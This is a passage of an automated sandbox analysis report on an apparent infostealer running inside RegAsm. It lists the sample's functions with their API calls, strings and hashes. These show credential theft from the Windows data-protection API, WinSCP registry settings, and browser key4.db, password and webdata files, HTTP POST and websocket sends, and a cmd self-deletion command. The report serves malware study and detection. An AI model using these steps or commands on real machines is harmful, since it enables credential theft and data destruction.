                                                                                                                                                                                                                                                            • CryptUnprotectData.CRYPT32 ref: 0040C04B
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CryptDataUnprotect
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 834300711-0
                                                                                                                                                                                                                                                            • Opcode ID: 76bf32a98701eed808fdec152c3dcd3fa556dd761d2147bff69bd5c35468af49
                                                                                                                                                                                                                                                            • Instruction ID: f83c4e979e2241c40376acb44744fe4fe1f605f54e99aba1f5e8c3a0c1513ffb
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 76bf32a98701eed808fdec152c3dcd3fa556dd761d2147bff69bd5c35468af49
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 69F06D719083068FC304DF28C984A16BBF1EFC9754F05CA5DE88897301E630D994CB96
                                                                                                                                                                                                                                                            Function 0042D98B Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetUserNameW.ADVAPI32(?,?), ref: 0042D9B4
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: NameUser
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2645101109-0
                                                                                                                                                                                                                                                            • Opcode ID: a27b26a9cc07503a5ffd4f9d8fd2edf3d2294b961f27338cad1e6b7784a11e9c
                                                                                                                                                                                                                                                            • Instruction ID: 06ca29c7c77cbb7dcb3cfc013ab395935eb095cd7e1a9a9979d4901d29d8eb17
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a27b26a9cc07503a5ffd4f9d8fd2edf3d2294b961f27338cad1e6b7784a11e9c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9DE092BB2042009BC310DF28DD91EA677E9EB86300F05456CA985C7251E670FC04C755
                                                                                                                                                                                                                                                            Function 00428DDA Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00428DF2
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DriveLogicalStrings
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2022863570-0
                                                                                                                                                                                                                                                            • Opcode ID: 113d1b87fdbe9d4d3ad158efa6e221a9b99e2fa62463c5cd1ef1ff41a886c9bb
                                                                                                                                                                                                                                                            • Instruction ID: f49399131d6cd1a0a0357cdb0235bfa083d093eafebc625f1058b8577526638d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 113d1b87fdbe9d4d3ad158efa6e221a9b99e2fa62463c5cd1ef1ff41a886c9bb
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 42F039B9E012059FEB08CF54D891BD87BB1BB04300F24047DE606DB782DA3499488B80
                                                                                                                                                                                                                                                            Function 0040A09E Relevance: 1.5, APIs: 1, Instructions: 18networkCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • recv.WS2_32(?,?,00001000,00000000), ref: 0040A0BA
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: recv
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1507349165-0
                                                                                                                                                                                                                                                            • Opcode ID: b6777f99fcc9ab9d3b0273c25965793aa14402d70d0dc89c73ee46f9b8689617
                                                                                                                                                                                                                                                            • Instruction ID: 22b8e15c2dc92d2d8ce7db97a0b63f0b975dcbef69a24b4e2dabaf85396e310b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b6777f99fcc9ab9d3b0273c25965793aa14402d70d0dc89c73ee46f9b8689617
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 81E01235340240EBE755D75CDD95F6133D5EB84344F4808387A16DB382EA74ED15C715
                                                                                                                                                                                                                                                            Function 0041F6B3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041F6D2
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2299586839-0
                                                                                                                                                                                                                                                            • Opcode ID: 074da7e7c8075810696abcef79b98451fad9a9472c3c4834b1dbe4cbc0ff9711
                                                                                                                                                                                                                                                            • Instruction ID: 328520a2f6c71d951bdf48b5bb8b27dd49798bebe312cf515b58bf2676e38ca3
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 074da7e7c8075810696abcef79b98451fad9a9472c3c4834b1dbe4cbc0ff9711
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 77E08CBA70030097D7188B4ADC55F35B3E6ABE8704F18842DA906CB3E5D678EC048600
                                                                                                                                                                                                                                                            Function 0042D6FE Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 126COMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 575 42d6fe-42d897 ShellExecuteExA memset ExitProcess 592 42d89b-42d8c0 575->592
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ExecuteExitProcessShellmemset
                                                                                                                                                                                                                                                            • String ID: " & exit$/c timeout /t 10 & rd /s /q "C:\ProgramData\$C:\Windows\system32\cmd.exe$open
                                                                                                                                                                                                                                                            • API String ID: 1852908831-1940193709
                                                                                                                                                                                                                                                            • Opcode ID: 95da33e724ad7f7f1facfc5f5cbbdf1cb13fd9b5e6c9d2578defee88dc884ed4
                                                                                                                                                                                                                                                            • Instruction ID: 098bc2924f9ee01437336e5800c6ce94c3868001c570cf6b015aab2e16dea32b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 95da33e724ad7f7f1facfc5f5cbbdf1cb13fd9b5e6c9d2578defee88dc884ed4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E418F76B006049BC700DF9EDC81AA973E5BFD9709B544139E818C3322DBB8EA5D8B5D
                                                                                                                                                                                                                                                            Function 0042D651 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 189COMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 625 42d651-42d8c0 ShellExecuteExA memset ExitProcess
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ExecuteExitProcessShellmemset
                                                                                                                                                                                                                                                            • String ID: " & exit$C:\Windows\system32\cmd.exe$open
                                                                                                                                                                                                                                                            • API String ID: 1852908831-1505117684
                                                                                                                                                                                                                                                            • Opcode ID: f39581be4dbb3ba82523aaef3800270a0935aa1f83886992f7c7e9bff6325244
                                                                                                                                                                                                                                                            • Instruction ID: e551c106cc49a58ed8e142b4f9164b15046ded37baae1d2c715c840eb547d2f3
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f39581be4dbb3ba82523aaef3800270a0935aa1f83886992f7c7e9bff6325244
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E6519E76B006048BC304DF9EDC81AAE73E5AFDA6067584139E815C3322DBB8EE5D875D
                                                                                                                                                                                                                                                            Function 00414223 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65registryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 651 414223-4142df memset * 4 RegOpenKeyExA
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0041423F
                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00414258
                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00414269
                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0041427A
                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 004142C2
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: memset$Open
                                                                                                                                                                                                                                                            • String ID: Software\Martin Prikryl\WinSCP 2\Configuration
                                                                                                                                                                                                                                                            • API String ID: 276825008-2822339690
                                                                                                                                                                                                                                                            • Opcode ID: 875ea9aeca57663236e07e7b8b738bcf569ddb3b5275693e73b7244f09e5574d
                                                                                                                                                                                                                                                            • Instruction ID: a4149cbd55dcf9ec5f86b160d7cd1004748f282e2d089feb1e299a34521fe547
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 875ea9aeca57663236e07e7b8b738bcf569ddb3b5275693e73b7244f09e5574d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9B11B2B2C511246BD720DBA6DC8DD9B3B7CEB8A310F04407EB519DB240E6B59914CBE5
                                                                                                                                                                                                                                                            Function 00409E2C Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 186networkCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 653 409e2c-40a062 send
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • send.WS2_32(?,00000000,00000000,00000000), ref: 0040A046
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: send
                                                                                                                                                                                                                                                            • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $GET
                                                                                                                                                                                                                                                            • API String ID: 2809346765-3104479224
                                                                                                                                                                                                                                                            • Opcode ID: 8a2df545890ebcd2ccde8c9d34e4fad38da15e8cd78b0d0eae1f2fea33df3467
                                                                                                                                                                                                                                                            • Instruction ID: f09d3922218363589a7554bb9a070cc817d1bc8e78065892c14d31b0da745550
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8a2df545890ebcd2ccde8c9d34e4fad38da15e8cd78b0d0eae1f2fea33df3467
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DB516876644101AFC324CB5CECD5F9A73D9AFC6214F0C4538E41AC3351E6B8AE28C75A
                                                                                                                                                                                                                                                            Function 0040CB8C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 124memoryfileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 678 40cb8c-40ccd6 RtlAllocateHeap RtlFreeHeap * 2 DeleteFileA 695 40ccda-40cce0 678->695 696 40cce5 695->696 696->696
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,00000000,000F423F), ref: 0040CBB0
                                                                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000000,00000000,?), ref: 0040CC9C
                                                                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000000,00000000,?), ref: 0040CCB4
                                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 0040CCCD
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Heap$Free$AllocateDeleteFile
                                                                                                                                                                                                                                                            • String ID: _passwords.db
                                                                                                                                                                                                                                                            • API String ID: 2632521614-1485422284
                                                                                                                                                                                                                                                            • Opcode ID: a7043d1debc52e48b3003d44f97e9eac390a076a658ce9e3e3632af536d91c4e
                                                                                                                                                                                                                                                            • Instruction ID: b37c3980acad7b287a63fd84c6568bc53c6d2d1415935e73d4ad3cc0f33b3f93
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7043d1debc52e48b3003d44f97e9eac390a076a658ce9e3e3632af536d91c4e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 85414EB66401159BD704EB6CEC95E6E77F9FFCA7047084428E419D3311CA34AA26CB9E
                                                                                                                                                                                                                                                            Function 00428787 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 697 428787-4288cc DeleteFileA CopyFileA call 422843 715 4288ce-4288f9 call 43a0c0 697->715
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 00428897
                                                                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,00000000,00000001), ref: 004288B6
                                                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004288DA
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: File$CopyDeleteUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                            • String ID: C:\ProgramData\
                                                                                                                                                                                                                                                            • API String ID: 3134562156-1890264202
                                                                                                                                                                                                                                                            • Opcode ID: 1dc461406ff4ef2b67ea95d6e394d442393c350d122ed3231eac641af7323cbc
                                                                                                                                                                                                                                                            • Instruction ID: 1e570ea21499aea3d5f253e6478c06357d2086eee86d9d4146b419b7b24b62a2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1dc461406ff4ef2b67ea95d6e394d442393c350d122ed3231eac641af7323cbc
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E3411F7AB006149FDB14DBACEC91E9D73F6EFC9304B080138E416E7351DA68AE19CB58
                                                                                                                                                                                                                                                            Function 0040E827 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 176fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 724 40e827-40e9fb CopyFileA 750 40e9fd call 40bc40 724->750 751 40e9fd call 40bd53 724->751 752 40e9fd call 40bd06 724->752 749 40e9ff-40ea1d 750->749 751->749 752->749
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040E9D2
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CopyFile
                                                                                                                                                                                                                                                            • String ID: C:\ProgramData\$\key4.db
                                                                                                                                                                                                                                                            • API String ID: 1304948518-833217315
                                                                                                                                                                                                                                                            • Opcode ID: 8d79dbb0ad1e7ac8fa06e4d058e647d1ef10b1d8f58137d4c59b0f9ceb188360
                                                                                                                                                                                                                                                            • Instruction ID: 6ad7053288e18fb2becd3ba35519820a6c95b5cb6f0518f62bf394652a1526bb
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8d79dbb0ad1e7ac8fa06e4d058e647d1ef10b1d8f58137d4c59b0f9ceb188360
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 79517EB67401149FC704CB9CDDC1FAD33BAEFC9604B084428E406E7356DA78AE25CB9A
                                                                                                                                                                                                                                                            Function 0040DDC3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 127fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 753 40ddc3-40df10 CopyFileA 772 40df16 call 40bc40 753->772 773 40df16 call 40bd53 753->773 771 40df18-40df36 772->771 773->771
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040DEE9
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CopyFile
                                                                                                                                                                                                                                                            • String ID: $|X$C:\ProgramData\
                                                                                                                                                                                                                                                            • API String ID: 1304948518-2556949440
                                                                                                                                                                                                                                                            • Opcode ID: b8ece8a38ac88d1a9e8b8c62dba14a6124fe639d5abe7aed50bc7201f7af8475
                                                                                                                                                                                                                                                            • Instruction ID: 210b412480b9b1f6e40c5c6a5c6a986acd163ec9f824bb5448706ba36133746a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b8ece8a38ac88d1a9e8b8c62dba14a6124fe639d5abe7aed50bc7201f7af8475
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D4197BAB421109FD714DB6CDC81BDD73F5AF8A304B094565E806D3321DB74AE24CB99
                                                                                                                                                                                                                                                            Function 0040E0C8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 774 40e0c8-40e217 CopyFileA
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040E1F0
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CopyFile
                                                                                                                                                                                                                                                            • String ID: $|X$C:\ProgramData\
                                                                                                                                                                                                                                                            • API String ID: 1304948518-2556949440
                                                                                                                                                                                                                                                            • Opcode ID: 90415b50240b5b3216ec83fa10819a54488d92d7aab5751acc4f0ee742999494
                                                                                                                                                                                                                                                            • Instruction ID: a0ca7a678a9fc7aef83b92d14bb0b022872ceb26902699c26760bdc125b8b43a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 90415b50240b5b3216ec83fa10819a54488d92d7aab5751acc4f0ee742999494
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1C415EB67420109BDB05CB9CDCD1FDD77B5BF8A304B094839E40AE3361DA74AE298B59
                                                                                                                                                                                                                                                            Function 0040DF3F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 101fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 791 40df3f-40e052 DeleteFileA 803 40e056-40e075 791->803
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 0040E049
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DeleteFile
                                                                                                                                                                                                                                                            • String ID: $|X$_webdata.db
                                                                                                                                                                                                                                                            • API String ID: 4033686569-158154304
                                                                                                                                                                                                                                                            • Opcode ID: b2a32d48ddfb3c47622254f12c8ef012da89dcf3320ef21effe23d5c0090a455
                                                                                                                                                                                                                                                            • Instruction ID: 7ce97649fd713c523dbf5e134aa6649b44230df0f9e0713be51a9fe393079403
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b2a32d48ddfb3c47622254f12c8ef012da89dcf3320ef21effe23d5c0090a455
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4D4183BAA411149FCB04CFACDC81ADDB7F5BF89300B098415E815E7325DB78AA15CF99
                                                                                                                                                                                                                                                            Function 00409499 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71networkCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: InternetOpen
                                                                                                                                                                                                                                                            • String ID: /json$http://localhost:
                                                                                                                                                                                                                                                            • API String ID: 2038078732-2510783600
                                                                                                                                                                                                                                                            • Opcode ID: 8a864b7860b02685fb0d26ae8b6599a1cba601e48febef6782172e7cfcd2b391
                                                                                                                                                                                                                                                            • Instruction ID: 45459252f50e20ced03a63bf4b8d1bda6480a2bb72c44b298b4a46f6f7c5d5a6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8a864b7860b02685fb0d26ae8b6599a1cba601e48febef6782172e7cfcd2b391
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B52183766442059BC304DF9CDC85A5E77E4BF85208F08483CE549D3321EAB8EE688B6A
                                                                                                                                                                                                                                                            Function 00404AE9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46networkCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,00000000,00000000,?,00000000), ref: 00404B5B
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: HttpOpenRequest
                                                                                                                                                                                                                                                            • String ID: HTTP/1.1$POST
                                                                                                                                                                                                                                                            • API String ID: 1984915467-2607092320
                                                                                                                                                                                                                                                            • Opcode ID: d21fb370a005446776328e75449b5897365f7ae1bdec50c34936bd4047556442
                                                                                                                                                                                                                                                            • Instruction ID: 489e1a762b887ea227d4b630a3577645a0fe19fdfbe815b004dd61040e86a9a9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d21fb370a005446776328e75449b5897365f7ae1bdec50c34936bd4047556442
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 160128B47201119FCB0CDB48DD81E6B33A9EF963087084039E901F3312E7B4AD588B69
